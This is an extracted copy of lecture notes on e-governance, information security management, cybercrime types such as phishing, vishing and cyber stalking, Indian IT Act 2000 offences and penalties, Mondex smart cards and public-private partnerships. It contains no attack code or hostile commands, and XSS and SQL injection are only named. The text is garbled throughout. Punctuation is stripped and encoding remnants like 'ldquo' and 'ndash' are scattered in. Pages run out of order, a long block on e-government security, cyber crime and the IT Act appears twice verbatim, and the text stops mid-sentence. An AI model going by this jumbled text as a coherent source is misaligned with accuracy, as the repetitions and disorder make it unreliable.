Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
